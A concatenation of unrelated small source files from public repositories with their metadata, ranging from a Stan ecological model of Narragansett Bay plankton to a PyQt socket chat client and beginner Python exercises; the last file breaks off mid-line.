"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"node_options": "",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/pb/2r7f4bq147bgw8b7s_x_s3900000gn/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
|
[
"dllido@MacBook-Pro-de-Dolores.local"
] |
dllido@MacBook-Pro-de-Dolores.local
|
faf55dcced2172399d37e25d66e39d89868333d0
|
280049c5d363df840e5a2184002e59625f0af61b
|
/datastructure11-balancedparanthesischeck.py
|
26c752c9dfffff64c23a2cf8d5095ae37812d617
|
[] |
no_license
|
deesaw/DataSPython
|
853c1b36f7185752613d6038e706b06fbf25c84e
|
c69a23dff3b3852310f145d1051f2ad1dda6b7b5
|
refs/heads/main
| 2023-02-19T13:36:01.547293
| 2021-01-16T13:15:56
| 2021-01-16T13:15:56
| 330,166,053
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 12:17:58 2021
@author: deesaw
"""
def balance_check(s):
# Check is even number of brackets
if len(s)%2 != 0:
return False
# Set of opening brackets
opening = set('([{')
# Matching Pairs
matches = set([ ('(',')'), ('[',']'), ('{','}') ])
# Use a list as a "Stack"
stack = []
# Check every parenthesis in string
for paren in s:
# If its an opening, append it to list
if paren in opening:
stack.append(paren)
else:
# Check that there are parentheses in Stack
if len(stack) == 0:
return False
# Check the last open parenthesis
last_open = stack.pop()
# Check if it has a closing match
if (last_open,paren) not in matches:
return False
return len(stack) == 0
from nose.tools import assert_equal
class TestBalanceCheck(object):
def test(self,sol):
assert_equal(sol('[](){([[[]]])}('),False)
assert_equal(sol('[{{{(())}}}]((()))'),True)
assert_equal(sol('[[[]])]'),False)
print('ALL TEST CASES PASSED')
# Run Tests
t = TestBalanceCheck()
t.test(balance_check)
|
[
"69420960+deesaw@users.noreply.github.com"
] |
69420960+deesaw@users.noreply.github.com
|
61c547985ebd1624cef39b0279164ca64369bd8b
|
54a2ac1972aa12e97e1029dddac6908a0e457d1c
|
/ej22.py
|
d564606a9f466aa3698b9b3467e6bba2ad18706d
|
[] |
no_license
|
bthecs/computacion-2
|
2e7b557ab365e74634772f58067b2bbe0ea5d1d3
|
69d54714da8f40fbef9a6635b4fe6b1b1638a11e
|
refs/heads/master
| 2023-03-18T22:38:21.953987
| 2019-12-11T15:42:25
| 2019-12-11T15:42:25
| 343,834,502
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from multiprocessing import Queue, Lock
import threading
import time
import os
def thread_function(x,l,q):
l.acquire()
time.sleep(1)
q.put("mi PID es: %d,Nombre: %s, Thread %d,Proceso: %d"%(os.getpid(),threading.current_thread().getName(),threading.get_ident(),x))
l.release()
def mostrarCola(q):
while True:
print(q.get())
if q.empty():
break
if __name__ == "__main__":
q = Queue()
l = Lock()
pid=os.getpid()
for x in range(3):
p1 = threading.Thread(target=thread_function, args=(x,l,q))
p1.start()
time.sleep(1)
p1.join()
mostrarCola(q)
|
[
"fl.gimenez@alumno.um.edu.ar"
] |
fl.gimenez@alumno.um.edu.ar
|
22aa2617e351bbbaf035cb3b8ac08016c4632660
|
41278a3ab6c8b8f280e785b79c15377a2de56a2d
|
/guardian.py
|
680dbcc6516d80fb29ac29c6bda4d43391c6e140
|
[] |
no_license
|
mayanand/restClient
|
1f0c70aad91d15c1a8d7f53bdc5c5c89ab6e5db8
|
927cffc1f2374760633da4bf6555801a80983469
|
refs/heads/master
| 2021-03-08T19:25:38.925946
| 2016-04-14T00:04:46
| 2016-04-14T00:04:46
| 56,193,486
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 721
|
py
|
#!/usr/bin/env python
from restapi import restAPI
from image import imageDownloader
class guardianRestAPI(restAPI):
def __init__(self):
restAPI.__init__(self)
self.RESTendpoint = "http://content.guardianapis.com/search?q=%s&api-key=%s"
self.apiKey = 'test'
def parseGuradianJSON(self, topic):
result = self.connect_api(topic)
imageDownloader_obj = imageDownloader()
for element in result['response']['results']:
imageDownloader_obj.get_images(element['webUrl'])
#pprint.pprint(result)
if __name__ == '__main__':
g_obj = guardianRestAPI()
g_obj.parseGuradianJSON('obama')
|
[
"Mayank Anand"
] |
Mayank Anand
|
fc140be5ed838830be722cb050742cde1b3cb053
|
87455bab2ddf7c9312453ca74689b133f3d6745d
|
/case_studies/npz/scripts/npz_narragansett_py.py
|
879eba3573907047de566834166742228e1a45bb
|
[] |
no_license
|
maxEntropyProd/bayesian_cbiomes
|
dd87d7f88e127e5f0699d15ae0ec3f2380b9ba89
|
c3a2f2e60f2271a0a4843e9db6be2111b765efa1
|
refs/heads/master
| 2020-12-06T06:30:34.433777
| 2020-01-10T14:06:20
| 2020-01-10T14:06:20
| 232,373,541
| 0
| 0
| null | 2020-01-07T17:01:40
| 2020-01-07T17:01:39
| null |
UTF-8
|
Python
| false
| false
| 14,243
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Confront the NPZ model with real data from Narrangansett Bay
#
# ## 1. A first look at the data
# In[1]:
import numpy as np
# load data from CSV file
datafile = 'data/data_npz_narragansett.csv'
data = np.loadtxt(datafile, skiprows=1, delimiter=',')
with open(datafile) as f:
data_names = f.readline().strip().split(',')
print(data_names)
# In[14]:
import matplotlib.pyplot as plt
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(data[:,0], data[:,iax+1])
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data')
axs[0].axhline(0.25, color='darkred')
axs[-1].plot(data[:,0], np.sum(data[:,1:],axis=1))
axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,data[-1,0],365.0))
axs[-1].grid(True)
# ### challenges for fitting data:
# * high noise level
# * no conservation of mass while NPZ model conserves mass
# ## 2. Modifications to the NPZ model
#
# allow influx and loss of N in the model:
# * introduce a background concentration for each variable and allow mixing with that background concentration
# * have a winter period for each year with stronger mixing and different background concentrations
# * estimate start and duration of winter period for each year (initial guess is based on data)
# * estimate background concentrations for winter and regular period (same for each year)
#
#
# In[3]:
# base initial guess of start and duration of the winter period based on N crossing a 0.25 threshold
stan_code_dataparams = '''data {
int<lower=0> nobs; // number of timesteps with observations
real<lower=0> tobs[nobs]; // obs times
int<lower=0> nobsvar; // number of observed variables
int<lower=0> iobsvar[nobsvar]; // index of observed variable (N=1, P=2, Z=3)
real<lower=0> obs[nobs,nobsvar]; // observed variable at measurement times
int<lower=0> nyears; // number of years (number of winters to add to the model)
}
transformed data {
real wintermixstart_guess[nyears];
real wintermixduration_guess[nyears];
{
int start = 0;
int iyear = 1;
real thresh = 0.25;
for (it in 1:nobs){
if (start == 0 && obs[it,1] >= thresh){
start = 1;
wintermixstart_guess[iyear] = tobs[it];
} else if (start == 1 && obs[it,1] < thresh && obs[it+1,1] < thresh){
start = 0;
wintermixduration_guess[iyear] = tobs[it] - wintermixstart_guess[iyear];
wintermixstart_guess[iyear] -= 365.0*(iyear-1);
iyear += 1;
if (iyear > nyears){
break;
}
}
}
}
// will be printed once by every chain
print("wintermixstart_guess = ",wintermixstart_guess);
print("wintermixduration_guess = ",wintermixduration_guess);
}
parameters {
real<lower=0> vmax; // maximum growth rate in Michaelis Menten formulation
real<lower=0> nuthalfsat; // nutrient half saturation in Michaelis Menten formulation
real<lower=0> graz; // zooplankton grazing rate
real<lower=0> mort_p; // phytoplankton mortality rate
real<lower=0> mort_z; // zooplankton mortality rate
real<lower=0> bgconc_n1; // N background concentration regular
real<lower=0> bgconc_n2; // N background concentration winter
real<lower=0> bgconc_p1; // P background concentration regular
real<lower=0> bgconc_p2; // P background concentration winter
real<lower=0> bgconc_z1; // Z background concentration regular
real<lower=0> bgconc_z2; // Z background concentration winter
real<lower=0> mix1; // mixing strength regular
real<lower=0> mix2; // mixing strength winter
real<lower=-100.0,upper=200.0> wintermixstart[nyears]; // start of winter mixing, restricted to broad winter period
real<lower=0> wintermixduration[nyears]; // duration of winter mixing
real<lower=1E-15> sigma[nobsvar]; // observation error standard deviations
real<lower=0> x0[3]; // initial conditions
}
transformed parameters {
real theta[13+2*nyears];
real x[nobs,3];
theta[1] = vmax;
theta[2] = nuthalfsat;
theta[3] = graz;
theta[4] = mort_p;
theta[5] = mort_z;
theta[6] = bgconc_n1;
theta[7] = bgconc_n2;
theta[8] = bgconc_p1;
theta[9] = bgconc_p2;
theta[10] = bgconc_z1;
theta[11] = bgconc_z2;
theta[12] = mix1;
theta[13] = mix2;
for (iyear in 1:nyears){
theta[13+2*iyear-1] = wintermixstart[iyear] + (iyear-1)*365.0;
theta[13+2*iyear] = theta[13+2*iyear-1] + wintermixduration[iyear];
}
x = integrate_ode_rk45(npz, x0, -1, tobs, theta,
rep_array(0.0, 0), rep_array(0, 0),
1e-5, 1e-4, 2e3*nyears);
}
'''
# In[4]:
# for now, do not fit data
stan_code_model_nofit = '''model {
x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions
x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions
x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions
sigma ~ exponential(1.0);
// priors for parameters
vmax ~ normal(0.15, 0.03);
nuthalfsat ~ normal(0.17, 0.04);
graz ~ normal(0.15, 0.04);
mort_p ~ normal(0.02, 0.01);
mort_z ~ normal(0.02, 0.005);
bgconc_n1 ~ normal(0.01, 0.001); // (regular)
bgconc_n2 ~ normal(0.66, 0.08); // (winter)
bgconc_p1 ~ normal(0.11, 0.01); // (regular)
bgconc_p2 ~ normal(0.05, 0.005); // (winter)
bgconc_z1 ~ normal(0.09, 0.01); // (regular)
bgconc_z2 ~ normal(0.05, 0.03); // (winter)
mix1 ~ normal(0.01, 0.03); // (regular)
mix2 ~ normal(0.19, 0.02); // (winter)
for (iyear in 1:nyears){
wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0);
wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0);
}
// no fitting of data yet
}
'''
# In[5]:
# mixing/exchange with background concentrations is implemented using a nudging/relaxation term
stan_code_functions = '''functions {
real[] npz(real t, // time
real[] x, // state
real[] theta, // parameters
real[] x_r, // real-valued input data (empty)
int[] x_i) { // integer-valued input data (empty)
/*
guide to theta:
theta[1]: vmax maximum growth rate in Michaelis Menten formulation
theta[2]: nuthalfsat nutrient half saturation in Michaelis Menten formulation
theta[3]: graz zooplankton grazing rate
theta[4]: mort_p phytoplankton mortality rate
theta[5]: mort_z zooplankton mortality rate
theta[6]: bgconc_n1 N background concentration regular
theta[7]: bgconc_n2 N background concentration winter
theta[8]: bgconc_p1 P background concentration regular
theta[9]: bgconc_p2 P background concentration winter
theta[10]: bgconc_z1 Z background concentration regular
theta[11]: bgconc_z2 Z background concentration winter
theta[12]: mix1 mixing strength regular
theta[13]: mix2 mixing strength winter
theta[14]: start time of first winter
theta[15]: stop time of first winter
theta[16]: start time of second winter
theta[17]: stop time of second winter
... number of winters is set to nyears
*/
real n = fmax(0.0, x[1]);
real p = fmax(0.0, x[2]);
real z = fmax(0.0, x[3]);
real growth = theta[1]*n/(theta[2]+n) * p; // nutrient-dependent growth
real grazing = theta[3]*p*z; // grazing
real ploss = theta[4]*p; // linear phytoplankton mortality
real zloss = theta[5]*z*z; // quadratic zooplankton mortality
// N,P,Z gain or loss terms due to mixing/exchange with background
real exch_n;
real exch_p;
real exch_z;
int i = 14;
while (i <= size(theta) && t>=theta[i]){
i += 1;
}
if ((i-13)%2 == 1){
// regular (non-winter) time
exch_n = theta[12]*(theta[6]-n);
exch_p = theta[12]*(theta[8]-p);
exch_z = theta[12]*(theta[10]-z);
} else {
// winter time
exch_n = theta[13]*(theta[7]-n);
exch_p = theta[13]*(theta[9]-p);
exch_z = theta[13]*(theta[11]-z);
}
return {-growth+ploss+zloss+exch_n,growth-grazing-ploss+exch_p,grazing-zloss+exch_z};
}
}
'''
# ## 3. Sampling from the prior
#
# Because we are not yet fitting data in the model, the Stan output are samples from the prior model solution.
# In[6]:
import pystan
# stitch together the code and compile it
stan_code = stan_code_functions + stan_code_dataparams + stan_code_model_nofit
model = pystan.StanModel(model_code=stan_code, model_name='NPZ')
# In[7]:
# reduce the dataset (to decrease runtime)
nyears = 2
index = data[:,0] <= nyears * 365
stan_data = {
'nobs':sum(index),
'tobs':data[index,0],
'nobsvar':3,
'iobsvar':(1,2,3), # all variables are observed
'obs':data[index,1:],
'nyears':nyears,
}
# In[8]:
# run the model, note low number of iterations/length of chain
mcmc = model.sampling(data=stan_data, iter=1000)
print(mcmc)
# In[9]:
# plot 100 randomly chosen prior solutions
index_prior = np.random.choice(mcmc['x'].shape[0], 100, replace=False)
t = data[index,0]
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(t, data[index,iax+1])
ax.plot(t, mcmc['x'][index_prior,:,iax].T, color='k', alpha=0.1)
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data and samples from the model prior')
axs[-1].plot(t, np.sum(data[index,1:],axis=1))
axs[-1].plot(t, np.sum(mcmc['x'][index_prior,:,:],axis=2).T, color='k', alpha=0.1)
axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0))
axs[-1].grid(True)
None
# ## 4. Reparameterizing the model and fitting data
#
# Normally we would use a statement like
# ```
# for(i in 1:nobsvar){
# for (iobs in 1:nobs){
# obs[iobs,i] ~ normal(x[iobs,iobsvar[i]], sigma[i]);
# }
# }
# ```
# in Stan's model block to fit the data. When formulated this way, Stan can have trouble sampling from the posterior distribution, for example when `sigma[i]` changes greatly for different values of `x[iobs,iobsvar[i]]`.
#
# Here it helps *a lot* (decrease in runtime by 1-2 orders of magnitude) to reparameterize the model:
# ```
# for(i in 1:nobsvar){
# for (iobs in 1:nobs){
# obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i];
# obs_normalized ~ std_normal();
# }
# }
# ```
#
# For more information, see the corresponding section in the [Stan user guide](https://mc-stan.org/docs/stan-users-guide/reparameterization-section.html).
# In[10]:
# reparameterized model block
stan_code_model = '''model {
real obs_normalized;
x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions
x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions
x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions
sigma ~ exponential(1.0);
// priors for parameters
vmax ~ normal(0.15, 0.03);
nuthalfsat ~ normal(0.17, 0.04);
graz ~ normal(0.15, 0.04);
mort_p ~ normal(0.02, 0.01);
mort_z ~ normal(0.02, 0.005);
bgconc_n1 ~ normal(0.01, 0.001); // (regular)
bgconc_n2 ~ normal(0.66, 0.08); // (winter)
bgconc_p1 ~ normal(0.11, 0.01); // (regular)
bgconc_p2 ~ normal(0.05, 0.005); // (winter)
bgconc_z1 ~ normal(0.09, 0.01); // (regular)
bgconc_z2 ~ normal(0.05, 0.03); // (winter)
mix1 ~ normal(0.01, 0.03); // (regular)
mix2 ~ normal(0.19, 0.02); // (winter)
for (iyear in 1:nyears){
wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0);
wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0);
}
// fitting the observations
for(i in 1:nobsvar){
for (iobs in 1:nobs){
obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i];
obs_normalized ~ std_normal();
}
}
}
'''
# In[11]:
# stitch together the updated code and compile it
stan_code = stan_code_functions + stan_code_dataparams + stan_code_model
model = pystan.StanModel(model_code=stan_code, model_name='NPZ')
# In[12]:
mcmc = model.sampling(data=stan_data, iter=2000)
print(mcmc)
# In[13]:
q = (5,25,50,75,95)
x_perc = np.percentile(mcmc['x'], q, axis=0)
fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12))
for iax,ax in enumerate(axs.flat[:-1]):
ax.plot(t, data[index,iax+1])
ax.fill_between(t, x_perc[0,:,iax], x_perc[-1,:,iax], alpha=0.2, color='C1')
ax.fill_between(t, x_perc[1,:,iax], x_perc[-2,:,iax], alpha=0.5, color='C1')
ax.plot(t, x_perc[2,:,iax], label='model', color='C1')
ax.set_ylabel(data_names[iax+1])
ax.grid(True)
axs[0].set_title('Narragansett Bay NPZ data and model posterior quantiles')
ax = axs[-1]
ax.plot(t, np.sum(data[index,1:],axis=1))
ax.fill_between(t, np.sum(x_perc[0,:,:],axis=1), np.sum(x_perc[-1,:,:],axis=1), alpha=0.2, color='C1')
ax.fill_between(t, np.sum(x_perc[1,:,:],axis=1), np.sum(x_perc[-2,:,:],axis=1), alpha=0.5, color='C1')
ax.plot(t, np.sum(x_perc[2,:,:],axis=1), label='model', color='C1')
ax.set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0))
ax.grid(True)
|
[
"gregleebritten@gmail.com"
] |
gregleebritten@gmail.com
|
b8fac3e471ae450389961aa1cb49b4834ce1d6cb
|
5b565e331073a8b29f997c30b58d383806f7d5a8
|
/pizzeria/11_env/bin/easy_install-3.7
|
242566d7d779997c369a8ea2a01c7db939a5250b
|
[] |
no_license
|
jeongwook/python_work
|
f403d5be9da6744e49dd7aedeb666a64047b248d
|
bba188f47e464060d5c3cd1f245d367da37827ec
|
refs/heads/master
| 2022-04-02T23:16:57.597664
| 2020-01-21T08:29:48
| 2020-01-21T08:29:48
| 227,506,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 288
|
7
|
#!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jeongwook.yu@utexas.edu"
] |
jeongwook.yu@utexas.edu
|
18b12259ea05cacdcb9d10fcdd104daa667751b6
|
4b59ace76840cbeb28f0fac19f128cd3959a7c3a
|
/catalog/api/v1/utility.py
|
4b15a94bb676733ffce5e82f091fc6cde3d1ce2c
|
[] |
no_license
|
JoshuadeJong/ecommerce-microservice
|
2a8f4d2f091c459dc9bcb47c01904f21c478cf91
|
246c6d0eb014df2946874cafcddebea1e0eaa97d
|
refs/heads/master
| 2023-03-25T23:57:15.369285
| 2021-03-19T15:47:32
| 2021-03-19T15:47:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
def item2dict(item_id, item) -> dict:
return {
"id": item_id,
"name": item.name,
"description": item.description,
"price": item.price,
"stock": item.stock
}
|
[
"joshuakdejong@gmail.com"
] |
joshuakdejong@gmail.com
|
3ae6423a2a19cb9678453bb48e72fd82b6afb002
|
36a92a0af4e4fa2b8191ddb8b0f0b8ed15c2baca
|
/send-cookies.py
|
999fd98911a1e0cbd4ef3f5f1e1606a3e11aad21
|
[] |
no_license
|
p4r7h/Python-script
|
043d6b70387f1834fac147e0ee88cfbb416ea205
|
45e0c39849c0a885b26db433cdfa94f885e1988b
|
refs/heads/main
| 2023-06-12T03:09:26.333375
| 2021-06-21T01:23:08
| 2021-06-21T01:23:08
| 344,584,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
import requests
url = 'http://ptl-e1cf1322-eb626166.libcurl.so/pentesterlab'
x = requests.get(url, cookies = {'key': 'please'})
print(x.text)
|
[
"noreply@github.com"
] |
p4r7h.noreply@github.com
|
4069b0b957b7c70d0f9663a86dd1cecb18c73276
|
1069b21592cd0771d69618d292e0511ec98251d9
|
/visual_client10_9.py
|
09d08582ba82f4698edc446c1688a703a3d9fcb8
|
[] |
no_license
|
12Dong/python-socket
|
6936fb6d7984c5948b31ce70837fab3437420b82
|
cdb754a104eb5a0ccdb260eea83a943ce67bf268
|
refs/heads/master
| 2021-08-24T14:06:05.261228
| 2017-12-10T04:42:05
| 2017-12-10T04:42:05
| 113,722,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,415
|
py
|
# coding:utf-8
import socket
import threading
import sys
from PyQt5.QtWidgets import QWidget,QApplication,QGridLayout,QLineEdit,QTextEdit,QLabel,QPushButton,QFrame
from PyQt5 import QtCore,QtWidgets
from PyQt5 import QtGui
from PyQt5.QtGui import*
from PyQt5.QtGui import QIcon
host = 'localhost'
port = 9999
username = '12Dong'
class Log(QFrame):
def __init__(self,s):
super().__init__()
self.initUI()
self.s=s
def initUI(self):
self.setObjectName('main')
self.Str = QLabel("Welcome to my chat room.Please input your nickname")
self.Nickname = QLabel('Nickname : ')
self.text = QLineEdit()
self.btnStart = QPushButton("Start!")
grid = QGridLayout()
grid.setSpacing(10)
grid.addWidget(self.Str,2,2,2,5)
grid.addWidget(self.Nickname,3,1,3,1)
grid.addWidget(self.text,3,2,3,4)
grid.addWidget(self.btnStart,3,6,3,6)
self.setLayout(grid)
self.creationAction()
self.setWindowTitle('Title')
self.setGeometry(500, 500, 500, 300)
with open('logbg.qss', 'r') as p:
self.setStyleSheet(p.read())
self.show()
def setNickname(self):
name = str(self.text.text())
self.text.setText('')
s.send(name.encode('utf-8'))
c = Client(name)
c.show()
self.close()
def creationAction(self):
self.btnStart.clicked.connect(self.setNickname)
class Client(QFrame):
def __init__(self, name):
super().__init__()
self.Nickname = name
self.initUI()
def initUI(self):
self.setWindowTitle('Client')
self.setNameWidget = QWidget()#
self.layout = QGridLayout(self)#
self.setNameLayout = QGridLayout(self.setNameWidget)#
self.btnSend = QPushButton('send')#
self.input = QLineEdit()#
self.chat = QTextEdit()#
self.timer = QtCore.QTimer()
self.messages = []
self.build()
self.createAction()
self.setWindowIcon(QIcon("mylove.ico"))
self.Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recvThread = threading.Thread(target=self.recvFromServer) #
recvThread.start()#
self.setGeometry(500,500,600,400)
self.setWindowTitle('Communcation')
with open('texteditbg.qss', 'r') as q:
self.setStyleSheet(q.read())
def sendToServer(self): #
global username
text = str(self.input.text())
self.input.setText('')
if text == 'Exit' or text=='':
self.exit()
try:
s.send(text.encode('utf-8'))
print('%s >> %s' % (username, text))
self.messages.append(self.Nickname+" : " + text )
except ConnectionAbortedError:
print('Server closed this connection!')
self.exit()
except ConnectionResetError:
print('Server is closed!')
self.exit()
def recvFromServer(self): #
while 1:
try:
data = s.recv(1024).decode('utf-8')
if not data:
exit()
print(data)
self.messages.append(data)
except ConnectionAbortedError:
print('Server closed this connection!')
self.exit()
except ConnectionResetError:
print('Server is closed!')
self.exit()
def showChat(self): #
for m in self.messages:
self.chat.append(m)
self.messages = []
def exit(self): #
s.close()
sys.exit()
def build(self):
self.layout.addWidget(self.chat, 0, 0, 5, 4)
self.layout.addWidget(self.input, 5, 0, 1, 3)
self.layout.addWidget(self.btnSend, 5, 3)
self.setLayout(self.layout)
def createAction(self):
self.btnSend.clicked.connect(self.sendToServer)
self.timer.timeout.connect(self.showChat)
self.timer.start(1000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
address = ('127.0.0.1', 31500)
Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Sock.sendto(b'1',address)
print(s.recv(1024).decode())
app = QApplication(sys.argv)
log = Log(s)
app.exec_()
#10/4 实现socket通行
#10/6 实现pyqt5封装,界面优化
#10/9 实现udp通信
#made by 12Dong
|
[
"289663639@qq.com"
] |
289663639@qq.com
|
82355523e5e347b9831a1ae711165e2ece5d664f
|
4aae80d02949928e859ea9536051f59ed14ec918
|
/apartment/house_summary.py
|
12793965147a94786cc6eaa2e1738a092d991116
|
[] |
no_license
|
xli1234/PythonProject
|
a6c5c61b8fb86d8b9b7dc2d39d3784db3184a46b
|
e2555e8befd086ac98881a91630b1260cf6709f0
|
refs/heads/master
| 2020-07-31T05:46:11.688485
| 2019-10-08T02:04:42
| 2019-10-08T02:04:42
| 210,504,536
| 4
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 535
|
py
|
import pandas as pd
def summary_house():
df = pd.read_csv('apartment/house_cache.csv')
zip_area = {15213: 'Oakland', 15217: 'Squirrel Hill', 15232: 'Shadyside'}
house_count = list(df[['Zip', 'Street']].groupby('Zip').count().values.reshape(3))
house_area = list(df[['Zip', 'Street']].groupby('Zip').count().index)
print('All three areas'.rjust(20), str(sum(house_count)).rjust(5), 'houses/apartments')
for i in range(len(house_area)):
print(zip_area[house_area[i]].rjust(20), str(house_count[i]).rjust(5), 'houses/apartments')
|
[
"34395567+shenshopping@users.noreply.github.com"
] |
34395567+shenshopping@users.noreply.github.com
|
09b1947d280f745d62a37740eb2545109fa7aba2
|
9ee0f0850d8743d08a2ecdf16e0e79ad58615908
|
/Arrendador/serializers.py
|
cabceb1ac480eb63740d2b5e64a3c8ee0f187ca9
|
[] |
no_license
|
alexgrajales/plataforma-web-de-gesti-n-de-inmuebles-para-arrendatarios-independientes.
|
20fb4ebb60940cd9fa40010515e8116cb4418d39
|
ce335f05ff6f217a5c3b94022b51bf37b46adf5c
|
refs/heads/master
| 2022-11-04T08:01:14.427926
| 2017-12-01T22:16:56
| 2017-12-01T22:16:56
| 110,597,537
| 0
| 1
| null | 2022-10-05T04:58:51
| 2017-11-13T20:20:53
|
Python
|
UTF-8
|
Python
| false
| false
| 271
|
py
|
from rest_framework import serializers
from rest_framework_mongoengine import serializers as mongoserializers
from Arrendador.models import Arrendador
class ArrendadorSerializer(mongoserializers.DocumentSerializer):
class Meta:
model = Arrendador
fields = '__all__'
|
[
"alex-12-04@hotmail.com"
] |
alex-12-04@hotmail.com
|
aab5b930200d680d23a2dbddf6c89da66a40ebc7
|
9460ee7136f277825b09e5f63675364461deacea
|
/GATE_Engine/libs/par/test/hierarchy.py
|
2f4e7fa88ecb974f8c8b074c616372ebccf3eb99
|
[
"MIT"
] |
permissive
|
DocDonkeys/GATE_Engine
|
9c4a5376e10e20774c20ec3f069b973e754cb058
|
bb2868884c6eec0ef619a45b7e21f5cf3857fe1b
|
refs/heads/master
| 2020-07-27T09:18:46.947405
| 2019-12-30T16:16:11
| 2019-12-30T16:16:11
| 209,041,360
| 1
| 3
|
MIT
| 2020-02-19T16:32:08
| 2019-09-17T11:58:13
|
C++
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
import json
flare = json.load(open('flare.json'))
print flare
things = []
def traverse(node, parent):
me = len(things)
print '{:3} {}'.format(me, node['name'])
things.append(parent)
children = node.get('children', [])
for child in children:
traverse(child, me)
traverse(flare, 0)
for i in xrange(len(things)):
print '{:3},'.format(things[i]),
if (i + 1) % 12 == 0: print;
print '---\n', len(things)
|
[
"36265669+DidacRomero@users.noreply.github.com"
] |
36265669+DidacRomero@users.noreply.github.com
|
36719882d3b660fcaa5d889e59fee49bb5b86525
|
a6ae6b2bb64b622338fc001b30a9f053717cc770
|
/toVOC/evaluation/evalute.py
|
ae710a548491b2f324491b17a26f860d2fca267c
|
[] |
no_license
|
tianws/script
|
1bec9f549fd801b5848f33f243d32db5bdd61722
|
3ecf2bca42e8c6c7f6a964ddc42acc3e483387fc
|
refs/heads/master
| 2021-06-04T11:53:32.337079
| 2021-01-12T08:20:13
| 2021-01-12T08:20:13
| 98,512,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,534
|
py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, unicode_literals
import argparse
import logging
import phodopus
import squirrel
import sys
if sys.version_info.major == 2:
from pathlib2 import Path
else:
from pathlib import Path
if __name__ == '__main__':
logging.basicConfig(
format='%(levelname)s:%(message)s', level=logging.INFO)
parser = argparse.ArgumentParser(
description='通过比较现成的识别输出文件(log)和标注文件(txt),以测评车尾或车道的识别效果')
parser.add_argument('log_pathname', action='store', type=Path)
parser.add_argument('label_pathname', action='store', type=Path)
group = parser.add_mutually_exclusive_group()
group.add_argument(
'-s', action='store_const', dest='module',
const=squirrel, help='squirrel')
group.add_argument(
'-p', action='store_const', dest='module',
const=phodopus, help='phodopus')
args = parser.parse_args(sys.argv[1:])
if args.module is None:
logging.error('You should choose -s or -p! See -h')
tp_count, fp_count, fn_count = args.module.parse(
args.log_pathname,
args.label_pathname)
precision, recall, fb_measure, _ = args.module.statistics(
tp_count,
fp_count,
fn_count)
logging.info('precision: {:.3}'.format(precision))
logging.info('recall: {:.3}'.format(recall))
logging.info('fb_measure: {:.3}'.format(fb_measure))
|
[
"tianws@mapbar.com"
] |
tianws@mapbar.com
|
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa
|
d8a541a2953c9729311059585bb0fca9003bd6ef
|
/Lists as stack ques/cups_and_bottles.py
|
efc8af013cd606d663a6539b7b98d2807e6c28fc
|
[] |
no_license
|
grigor-stoyanov/PythonAdvanced
|
ef7d628d2b81ff683ed8dd47ee307c41b2276dd4
|
0a6bccc7faf1acaa01979d1e23cfee8ec29745b2
|
refs/heads/main
| 2023-06-10T09:58:04.790197
| 2021-07-03T02:52:20
| 2021-07-03T02:52:20
| 332,509,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
from collections import deque
cups = deque(map(int, input().split()))
bottles = list(map(int, input().split()))
wasted_water = 0
while cups and bottles:
current_cup = cups.popleft()
while current_cup > 0 and bottles:
current_bottle = bottles.pop()
current_cup -= current_bottle
if current_cup < 0:
wasted_water += -current_cup
if not cups:
print('Bottles: ', end='')
print(*[bottles.pop() for i in range(len(bottles))])
else:
print('Cups: ', end='')
